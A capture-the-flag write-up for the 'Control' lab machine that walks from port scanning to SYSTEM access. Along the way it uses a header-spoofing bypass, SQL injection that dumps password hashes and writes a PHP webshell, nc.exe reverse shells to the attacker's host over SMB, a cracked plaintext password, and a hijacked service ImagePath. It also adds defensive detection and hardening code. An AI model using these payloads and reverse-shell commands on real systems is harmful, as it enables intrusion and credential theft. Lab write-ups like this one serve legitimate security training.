Control

Enumeration
As always, we start with the enumeration phase: scan the machine for open ports, then identify the services and versions behind them.
The following nmap command scans the whole port range quickly and saves the output to a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.167 -oN allPorts
-sS
use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000
nmap will try to keep the sending rate at or above 5000 packets per second.
-p-
scan the entire port range, from 1 to 65535.
-T5
insane mode, the fastest of the nmap timing templates.
-Pn
assume the host is online (skip host discovery).
-n
scan without reverse DNS resolution.
-oN
save the scan result into a file, in this case the allPorts file.
# Nmap 7.93 scan initiated Mon Mar 27 11:11:02 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.167
Nmap scan report for 10.10.10.167
Host is up (0.059s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
3306/tcp open mysql
49666/tcp open unknown
49667/tcp open unknown
# Nmap done at Mon Mar 27 11:11:28 2023 -- 1 IP address (1 host up) scanned in 26.63 seconds
Now that we know which ports are open, let's identify the services and versions running on them. The following command scans those ports in more depth and saves the result to a file:
nmap -sC -sV -p80,135,3306,49666,49667 10.10.10.167 -oN targeted
-sC
perform the scan using the default set of scripts.
-sV
enable version detection.
-oN
save the scan result into a file, in this case the targeted file.
# Nmap 7.93 scan initiated Mon Mar 27 11:12:08 2023 as: nmap -sCV -p80,135,3306,49666,49667 -Pn -oN targeted 10.10.10.167
Nmap scan report for 10.10.10.167
Host is up (0.099s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Fidelity
135/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql?
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 27 11:13:08 2023 -- 1 IP address (1 host up) scanned in 60.63 seconds
The website shows a landing page with four buttons.

There is a comment in the source code of the main page with an IP address.

The Admin button redirects to admin.php, which returns an error message about a missing header.

Exploitation
We can try to brute-force the header name. Let's use wfuzz with a wordlist of HTTP request header names, sending each candidate header with the IP address found in the source code as its value. The --hh=89 option hides the 89-character "missing header" response, so only headers that change the reply are shown.
wfuzz -c --hh=89 -t 200 -w /usr/share/seclists/Miscellaneous/web/http-request-headers/http-request-headers-fields-large.txt -H "FUZZ: 192.168.4.28" http://10.10.10.167/admin.php
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.167/admin.php
Total requests: 1185
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000145: 400 6 L 34 W 374 Ch "Content-Length"
000000732: 501 6 L 26 W 343 Ch "Transfer-Encoding"
000000923: 200 153 L 466 W 7933 Ch "X-Forwarded-For"
Total time: 0
Processed Requests: 1185
Filtered Requests: 1182
Requests/sec.: 0
The X-Forwarded-For header returns a 200 status code: the application identifies the client by the value of this header, which any client can set, so the IP-based restriction is bypassed by supplying the expected address ourselves. Let's use Burp Suite as a proxy and inject this header into every request we make from our browser. Configure it from Proxy > Proxy settings > Match and replace rules.

Now we have access to the admin page.
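Why that works, and what the check should have looked like: admin.php trusts X-Forwarded-For, a header the client itself supplies. The following is an added Python example (not code from the Control box or its author) modelling the vulnerable check beside a hardened one that honours the header only when the request arrives from a known reverse proxy (192.168.4.1 is an assumed proxy address for the example), together with a small header probe that mirrors what the wfuzz run did.

```python
"""Why the X-Forwarded-For bypass works, and how the check should have been written.

Added example, not code from the Control box: a minimal model of an admin
page that restricts access by client IP. The vulnerable version takes the
client address from X-Forwarded-For, a header any client can set; the
hardened version only honours that header when the TCP peer is a known
reverse proxy, and otherwise uses the socket address. The proxy address
192.168.4.1 is an assumption for the example.
"""

ALLOWED_ADMIN_IP = "192.168.4.28"      # the address leaked in the page's HTML comment
TRUSTED_PROXIES = {"192.168.4.1"}      # assumed address of a legitimate reverse proxy


def vulnerable_is_admin(remote_addr, headers):
    """How admin.php behaves: the header wins over the real peer address."""
    client = headers.get("X-Forwarded-For", remote_addr)
    return client.strip() == ALLOWED_ADMIN_IP


def resolve_client_ip(remote_addr, headers, trusted_proxies=TRUSTED_PROXIES):
    """Return the client address, trusting X-Forwarded-For only behind a trusted proxy.

    XFF is a chain 'client, proxy1, proxy2': each proxy appends the peer it
    saw. Only the entries appended by proxies we trust can be believed, so
    walk from the right and stop at the first hop that is not ours.
    """
    if remote_addr not in trusted_proxies:
        return remote_addr        # direct connection: the header is attacker-controlled
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        if hop not in trusted_proxies:
            return hop
    return remote_addr            # header missing, or it lists only our own proxies


def hardened_is_admin(remote_addr, headers):
    """Same policy as the vulnerable check, but on a client IP we can vouch for."""
    return resolve_client_ip(remote_addr, headers) == ALLOWED_ADMIN_IP


def probe_headers(check, candidates, value, attacker_ip="10.10.14.11"):
    """What the wfuzz run did: which header names flip the verdict for the attacker's IP?"""
    return [name for name in candidates if check(attacker_ip, {name: value})]


if __name__ == "__main__":
    names = ["X-Real-IP", "Client-IP", "X-Forwarded-For", "True-Client-IP"]
    print("vulnerable app accepts:", probe_headers(vulnerable_is_admin, names, ALLOWED_ADMIN_IP))
    print("hardened app accepts:  ", probe_headers(hardened_is_admin, names, ALLOWED_ADMIN_IP))
```

Against the vulnerable check the probe returns only X-Forwarded-For, exactly the wfuzz result; against the hardened check a direct connection from the attacker's address can present any header it likes and still be treated as 10.10.14.11.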

If we search for a product whose name contains a ' character, an SQL error appears, which means the site is probably vulnerable to SQL injection.

First, we need to know the number of columns returned by the query. Increasing the ORDER BY index until the page errors tells us the count: ORDER BY 6 works without any error, while ORDER BY 7 would fail, so the query returns 6 columns.
p' order by 6-- -

Now, we could try to list the available databases.
p' union select schema_name,2,3,4,5,6 from information_schema.schemata-- -

There is a database called mysql. Its user table stores account names and password hashes in the user and password columns (on MySQL 5.7 and later the hash column is called authentication_string instead). Let's retrieve the data from those columns.
p' union select user,password,3,4,5,6 from mysql.user-- -

We get password hashes for the users root, manager and hector. We can try to break them with rainbow tables or an online lookup; MySQL's usual 41-character hashes (a * followed by SHA-1 of SHA-1) can also be attacked offline with hashcat mode 300.

These credentials might be useful later. Let's try to get a shell on the system. One thing we can do is check which database user is running our queries:
p' union select user(),2,3,4,5,6-- -

It is the manager user, which happens to have the FILE privilege, so we can write files on the system:
p' union select grantee,privilege_type,is_grantable,4,5,6 from information_schema.user_privileges-- -

As the web server is IIS 10.0, the website should be located in C:\inetpub\wwwroot\. Create a PHP webshell in that directory. MySQL treats a backslash inside a string literal as an escape character (\r would turn into a carriage return), so the path is written with forward slashes, which Windows accepts; doubling the backslashes works too.
p' union select "<?php system($_GET[\'cmd\']);?>",2,3,4,5,6 into outfile "c:/inetpub/wwwroot/rce.php"-- -
Now, set a netcat listener on port 4444.
nc -lvnp 4444
-l
listen mode.
-v
verbose mode.
-n
numeric-only IP, no DNS resolution.
-p
specify the port to listen on.
And an SMB server sharing the directory where the nc.exe binary is located:
impacket-smbserver smbFolder $(pwd) -smb2support
Finally, fetch nc.exe over SMB and send a reverse shell to our netcat listener, which gives us a shell as nt authority\iusr. The URL is single-quoted so the local shell does not consume the backslashes of the UNC path:
curl 'http://10.10.10.167/rce.php?cmd=\\10.10.14.11\smbFolder\nc.exe+-e+cmd+10.10.14.11+4444'
Listening on 0.0.0.0 4444
Connection received on 10.10.10.167 49698
Microsoft Windows [Version 10.0.17763.805]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\inetpub\wwwroot>whoami
whoami
nt authority\iusr
Privilege Escalation
Listing the local users shows an account called Hector.
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
Hector WDAGUtilityAccount
The command completed with one or more errors.
Hector is a member of the Remote Management Users group, so we can try to run commands as this user by building a PSCredential from the password we cracked earlier and using Invoke-Command:
powershell
hostname
$user = "Control\hector"
$password = ConvertTo-SecureString 'l33th4x0rhector' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($user, $password)
Invoke-Command -Credential $cred -ComputerName localhost -ScriptBlock { whoami }
control\hector
As we can run commands as hector, let's get a reverse shell as him. First, set another netcat listener on port 5555, this time wrapped in rlwrap so the shell gets command history and line editing (the nc flags are the same as before).
rlwrap nc -lvnp 5555
Then send the reverse shell through Invoke-Command (the UNC path needs both leading backslashes). Once it connects, we can grab the user flag.
Invoke-Command -Credential $cred -ComputerName localhost -ScriptBlock { \\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 5555 }
Listening on 0.0.0.0 5555
Connection received on 10.10.10.167 49706
Microsoft Windows [Version 10.0.17763.805]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\Hector\Documents>whoami
whoami
control\hector
C:\Users\Hector\Documents>type \users\hector\desktop\user.txt
type \users\hector\desktop\user.txt
9943350f7b824c5464aad64a2e5400f6
In the PowerShell history file there are a few interesting commands:
type \Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
get-acl HKLM:\SYSTEM\CurrentControlSet | format-list
Let's open a PowerShell shell and inspect these commands. The first one lists the keys under CurrentControlSet, one of which is Services.
powershell
get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
...
Property : {}
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName : Services
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount : 667
View : Default
Handle : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount : 0
Name : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services
...
The second one lists the ACL of CurrentControlSet.
get-acl HKLM:\SYSTEM\CurrentControlSet | format-list
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet
Owner : BUILTIN\Administrators
Group : NT AUTHORITY\SYSTEM
Access : BUILTIN\Administrators Allow FullControl
NT AUTHORITY\Authenticated Users Allow ReadKey
NT AUTHORITY\Authenticated Users Allow -2147483648
S-1-5-32-549 Allow ReadKey
S-1-5-32-549 Allow -2147483648
BUILTIN\Administrators Allow FullControl
BUILTIN\Administrators Allow 268435456
NT AUTHORITY\SYSTEM Allow FullControl
NT AUTHORITY\SYSTEM Allow 268435456
CREATOR OWNER Allow 268435456
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadKey
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow -2147483648
S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681 Allow
ReadKey
S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681 Allow
-2147483648
Audit :
Sddl : O:BAG:SYD:AI(A;;KA;;;BA)(A;ID;KR;;;AU)(A;CIIOID;GR;;;AU)(A;ID;KR;;;SO)(A;CIIOID;GR;;;SO)(A;ID;KA;;;BA)(A;CIIOI
D;GA;;;BA)(A;ID;KA;;;SY)(A;CIIOID;GA;;;SY)(A;CIIOID;GA;;;CO)(A;ID;KR;;;AC)(A;CIIOID;GR;;;AC)(A;ID;KR;;;S-1-15-
3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)(A;CIIOID;GR;;;S
-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)
As this output is hard to read, we can view the DACL in a more human-readable way. Note that this time we look at the Services subkey, which is where Hector turns up:
$acl = get-acl HKLM:\SYSTEM\CurrentControlSet\Services
ConvertFrom-SddlString -Sddl $acl.Sddl | Foreach-Object {$_.DiscretionaryAcl}
NT AUTHORITY\Authenticated Users: AccessAllowed (ExecuteKey, ListDirectory, ReadExtendedAttributes, ReadPermissions, WriteExtendedAttributes)
NT AUTHORITY\SYSTEM: AccessAllowed (ChangePermissions, CreateDirectories, Delete, ExecuteKey, FullControl, GenericExecute, GenericWrite, ListDirectory, ReadExtendedAttributes, ReadPermissions, TakeOwnership, Traverse, WriteData, WriteExtendedAttributes, WriteKey)
BUILTIN\Administrators: AccessAllowed (ChangePermissions, CreateDirectories, Delete, ExecuteKey, FullControl, GenericExecute, GenericWrite, ListDirectory, ReadExtendedAttributes, ReadPermissions, TakeOwnership, Traverse, WriteData, WriteExtendedAttributes, WriteKey)
CONTROL\Hector: AccessAllowed (ChangePermissions, CreateDirectories, Delete, ExecuteKey, FullControl, GenericExecute, GenericWrite, ListDirectory, ReadExtendedAttributes, ReadPermissions, TakeOwnership, Traverse, WriteData, WriteExtendedAttributes, WriteKey)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES: AccessAllowed (ExecuteKey, ListDirectory, ReadExtendedAttributes, ReadPermissions, WriteExtendedAttributes)
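The Sddl string is the compact form of the same information, and reading it directly is often quicker than the Access listing: each (A;flags;rights;;;SID) tuple is one allow ACE, and the flags say whether it applies to the key itself or only to subkeys (IO, inherit only). The following added Python example (not from the writeup) parses the D: section, explains the odd numeric rights Get-Acl printed (-2147483648 is GENERIC_READ, 268435456 is GENERIC_ALL), and lists any principal other than Administrators and SYSTEM that can change the key. PAGE_SDDL is the CurrentControlSet string from the output above joined onto one line; the Hector ACE and its domain SID are constructed, since the writeup shows only the expanded form for the Services key.

```python
"""Decoding the SDDL from Get-Acl to find who can write to a registry key.

Added example, not part of the writeup: a parser for the DACL section of an
SDDL string that expands the ACE type, inheritance flags and rights codes,
explains the numbers Get-Acl prints for generic rights, and lists principals
outside Administrators and SYSTEM that can change the key itself. PAGE_SDDL
is the CurrentControlSet string from the writeup; HECTOR_SDDL is constructed,
with a made-up domain SID, to show how a user-writable key stands out.
"""
import re

SID_ALIASES = {  # well-known SDDL SID abbreviations (subset)
    "BA": "BUILTIN\\Administrators", "SY": "NT AUTHORITY\\SYSTEM",
    "AU": "NT AUTHORITY\\Authenticated Users", "SO": "BUILTIN\\Server Operators",
    "CO": "CREATOR OWNER", "AC": "ALL APPLICATION PACKAGES", "BU": "BUILTIN\\Users",
    "WD": "Everyone", "IU": "NT AUTHORITY\\INTERACTIVE",
}
RIGHTS_CODES = {  # two-letter rights codes -> access mask
    "KA": 0xF003F, "KR": 0x20019, "KW": 0x20006, "KX": 0x20019,
    "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,
    "RC": 0x20000, "SD": 0x10000, "WD": 0x40000, "WO": 0x80000,
}
NAMED_BITS = [
    (0x10000000, "GENERIC_ALL"), (0x80000000, "GENERIC_READ"),
    (0x40000000, "GENERIC_WRITE"), (0x20000000, "GENERIC_EXECUTE"),
    (0x1, "KEY_QUERY_VALUE"), (0x2, "KEY_SET_VALUE"), (0x4, "KEY_CREATE_SUB_KEY"),
    (0x8, "KEY_ENUMERATE_SUB_KEYS"), (0x10, "KEY_NOTIFY"), (0x20, "KEY_CREATE_LINK"),
    (0x10000, "DELETE"), (0x20000, "READ_CONTROL"), (0x40000, "WRITE_DAC"),
    (0x80000, "WRITE_OWNER"),
]
# Any of these lets the holder change the key's values, subkeys, DACL or owner.
WRITE_MASK = 0x2 | 0x4 | 0x10000 | 0x40000 | 0x80000 | 0x40000000 | 0x10000000
EXPECTED_WRITERS = {"BA", "SY"}

PAGE_SDDL = (  # Sddl of HKLM:\SYSTEM\CurrentControlSet as printed in the writeup
    "O:BAG:SYD:AI(A;;KA;;;BA)(A;ID;KR;;;AU)(A;CIIOID;GR;;;AU)(A;ID;KR;;;SO)(A;CIIOID;GR;;;SO)"
    "(A;ID;KA;;;BA)(A;CIIOID;GA;;;BA)(A;ID;KA;;;SY)(A;CIIOID;GA;;;SY)(A;CIIOID;GA;;;CO)"
    "(A;ID;KR;;;AC)(A;CIIOID;GR;;;AC)"
    "(A;ID;KR;;;S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)"
    "(A;CIIOID;GR;;;S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)"
)
HECTOR_SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"   # constructed, not the real SID
HECTOR_SDDL = PAGE_SDDL + "(A;CI;KA;;;" + HECTOR_SID + ")"     # constructed: full control, applies to the key


def parse_rights(field):
    """Rights are either a hex mask or a run of two-letter codes."""
    if field.lower().startswith("0x"):
        return int(field, 16)
    mask = 0
    for i in range(0, len(field), 2):
        mask |= RIGHTS_CODES[field[i:i + 2]]
    return mask


def rights_names(mask):
    """Human-readable names for the bits in an access mask (accepts the signed form too)."""
    mask &= 0xFFFFFFFF
    return [name for bit, name in NAMED_BITS if mask & bit]


def parse_dacl(sddl):
    """Return the ACEs of the D: section as dicts."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    if not m:
        return []
    aces = []
    for body in re.findall(r"\(([^)]*)\)", m.group(1)):
        ace_type, flags, rights, _obj, _inherit, sid = body.split(";")[:6]
        aces.append({
            "type": ace_type,                                             # A = allow, D = deny
            "flags": [flags[i:i + 2] for i in range(0, len(flags), 2)],  # CI, OI, IO, ID, ...
            "mask": parse_rights(rights),
            "sid": sid,
            "principal": SID_ALIASES.get(sid, sid),
        })
    return aces


def describe(sddl):
    """One line per ACE, roughly what ConvertFrom-SddlString prints."""
    return [f'{a["principal"]}: {"Allow" if a["type"] == "A" else "Deny"} '
            f'[{"".join(a["flags"])}] {", ".join(rights_names(a["mask"]))}'
            for a in parse_dacl(sddl)]


def unexpected_writers(sddl, expected=EXPECTED_WRITERS):
    """Principals outside `expected` that can modify this key (not only its children)."""
    out = []
    for ace in parse_dacl(sddl):
        if ace["type"] != "A" or "IO" in ace["flags"]:
            continue  # deny ACEs grant nothing; inherit-only ACEs apply to subkeys only
        if ace["mask"] & WRITE_MASK and ace["sid"] not in expected:
            out.append(ace["principal"])
    return out


if __name__ == "__main__":
    print("\n".join(describe(HECTOR_SDDL)))
    print("unexpected writers:", unexpected_writers(HECTOR_SDDL))
```

Run against the page's CurrentControlSet string the writer list is empty: every write-capable ACE belongs to Administrators or SYSTEM, and the CREATOR OWNER entry is inherit-only. Appending the constructed Hector ACE makes that SID the sole unexpected writer, which is the condition winPEAS reports for seclogon below.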
As seen above, hector has full control over the Services key, so he can modify the configuration of every service under it. To verify this, let's run winPEAS. Copy it to the directory shared by the SMB server and run it from the victim machine:
\\10.10.14.11\smbFolder\winPEASany.exe
...
Looking if you can modify any service registry
...
HKLM\system\currentcontrolset\services\seclogon (Hector [FullControl])
...
There are a few services we can modify. One of them is seclogon, whose ObjectName is LocalSystem, so whatever binary the service launches runs as SYSTEM:
powershell (gp -path hklm:\system\currentcontrolset\services\seclogon).ObjectName
LocalSystem
We need to change the service's ImagePath, the command line the Service Control Manager executes when the service starts. Its current configuration:
reg query HKLM\System\CurrentControlSet\Services\seclogon
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\seclogon
Description REG_SZ @%SystemRoot%\system32\seclogon.dll,-7000
DisplayName REG_SZ @%SystemRoot%\system32\seclogon.dll,-7001
ErrorControl REG_DWORD 0x1
FailureActions REG_BINARY 805101000000000000000000030000001400000001000000C0D4010001000000E09304000000000000000000
ImagePath REG_EXPAND_SZ %windir%\system32\svchost.exe -k netsvcs -p
ObjectName REG_SZ LocalSystem
RequiredPrivileges REG_MULTI_SZ SeTcbPrivilege\0SeRestorePrivilege\0SeBackupPrivilege\0SeAssignPrimaryTokenPrivilege\0SeIncreaseQuotaPrivilege\0SeImpersonatePrivilege
Start REG_DWORD 0x3
Type REG_DWORD 0x20
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\seclogon\Parameters
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\seclogon\Security
Change the ImagePath to our nc.exe binary on the local SMB server, so that starting the service sends a reverse shell to our machine on port 6666:
reg add HKLM\System\CurrentControlSet\Services\seclogon /t REG_EXPAND_SZ /v ImagePath /d "\\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 6666" /f
Set another netcat listener on port 6666.
nc -lvnp 6666
The service is currently stopped (Start is 0x3, demand start), so nothing happens until we start it ourselves:
sc query seclogon
SERVICE_NAME: seclogon
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 1077 (0x435)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
All we have to do is start the service to get a shell as nt authority\system, then read the root flag. Since nc.exe never reports back to the Service Control Manager, sc start will eventually fail with a timeout and the SCM may terminate the process, so read the flag promptly or spawn a second shell from the first one.
sc start seclogon
Listening on 0.0.0.0 6666
Connection received on 10.10.10.167 49721
Microsoft Windows [Version 10.0.17763.805]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>type \users\administrator\desktop\root.txt
type \users\administrator\desktop\root.txt
c31ba53ef095b0b4f380a162099c6eba
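From the defender's side, the tampered seclogon key is easy to recognise: a service that runs as LocalSystem whose ImagePath no longer points under %SystemRoot%. The following is an added Python example (not part of the original writeup) that parses reg query output of the form shown above and flags exactly those two conditions. ORIGINAL_DUMP is the seclogon dump from this page, TAMPERED_DUMP the same values after the reg add above, and the environment variable mapping is constructed.

```python
"""Spotting a hijacked service ImagePath in a `reg query` dump.

Added example, not part of the writeup: a parser for the text `reg query`
prints for a service key, plus a check for the two properties that made
seclogon worth attacking: the service runs as LocalSystem and its ImagePath
has been pointed at a binary outside the Windows directory (here a UNC path
on an attacker share). ORIGINAL_DUMP is the seclogon output from the writeup;
TAMPERED_DUMP is the same dump with the ImagePath as modified by the reg add
command. The environment mapping is a constructed stand-in for the host's.
"""
import re

ORIGINAL_DUMP = r"""
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\seclogon
    Description    REG_SZ    @%SystemRoot%\system32\seclogon.dll,-7000
    DisplayName    REG_SZ    @%SystemRoot%\system32\seclogon.dll,-7001
    ErrorControl    REG_DWORD    0x1
    FailureActions    REG_BINARY    805101000000000000000000030000001400000001000000C0D4010001000000E09304000000000000000000
    ImagePath    REG_EXPAND_SZ    %windir%\system32\svchost.exe -k netsvcs -p
    ObjectName    REG_SZ    LocalSystem
    RequiredPrivileges    REG_MULTI_SZ    SeTcbPrivilege\0SeRestorePrivilege\0SeBackupPrivilege\0SeAssignPrimaryTokenPrivilege\0SeIncreaseQuotaPrivilege\0SeImpersonatePrivilege
    Start    REG_DWORD    0x3
    Type    REG_DWORD    0x20

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\seclogon\Parameters
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\seclogon\Security
"""
TAMPERED_DUMP = ORIGINAL_DUMP.replace(
    r"%windir%\system32\svchost.exe -k netsvcs -p",
    r"\\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 6666")

ENV = {"windir": r"C:\Windows", "systemroot": r"C:\Windows",
       "programfiles": r"C:\Program Files"}   # constructed environment of the host


def parse_reg_query(text):
    """Map value name -> (type, data). Subkey lines carry no REG_ type and are skipped."""
    values = {}
    for line in text.splitlines():
        m = re.match(r"^\s*(\S+)\s+(REG_[A-Z_]+)\s+(.*?)\s*$", line)
        if m:
            values[m.group(1)] = (m.group(2), m.group(3))
    return values


def expand_env(path, env=ENV):
    """Expand %VAR% references the way REG_EXPAND_SZ values are expanded at use."""
    return re.sub(r"%([^%]+)%", lambda m: env.get(m.group(1).lower(), m.group(0)), path)


def service_binary(image_path):
    """First token of the ImagePath command line, honouring a quoted path."""
    s = image_path.strip()
    if s.startswith('"'):
        return s[1:s.index('"', 1)]
    return s.split(" ", 1)[0]


def hijack_indicators(values, env=ENV):
    """Return human-readable findings for one service's registry values."""
    findings = []
    if "ImagePath" not in values:
        return findings
    binary = expand_env(service_binary(values["ImagePath"][1]), env).lower()
    if binary.startswith("\\\\"):
        findings.append("ImagePath is a UNC path: binary loaded from a remote share")
    elif not binary.startswith((env["systemroot"].lower() + "\\",
                                env["programfiles"].lower() + "\\")):
        findings.append("ImagePath points outside the Windows and Program Files directories")
    account = values.get("ObjectName", ("", ""))[1]
    if findings and account.lower() == "localsystem":
        findings.append("service account is LocalSystem: the replaced binary runs as SYSTEM")
    return findings


if __name__ == "__main__":
    for label, dump in (("original", ORIGINAL_DUMP), ("tampered", TAMPERED_DUMP)):
        print(label, hijack_indicators(parse_reg_query(dump)) or ["no findings"])
```

The original seclogon values expand to the svchost.exe binary under C:\Windows and produce no findings; the tampered dump yields two, the UNC ImagePath and the LocalSystem account that turns the write into a SYSTEM shell. A periodic diff of the Services hive against a known-good export catches this whether the attacker used reg add, sc config or PowerShell.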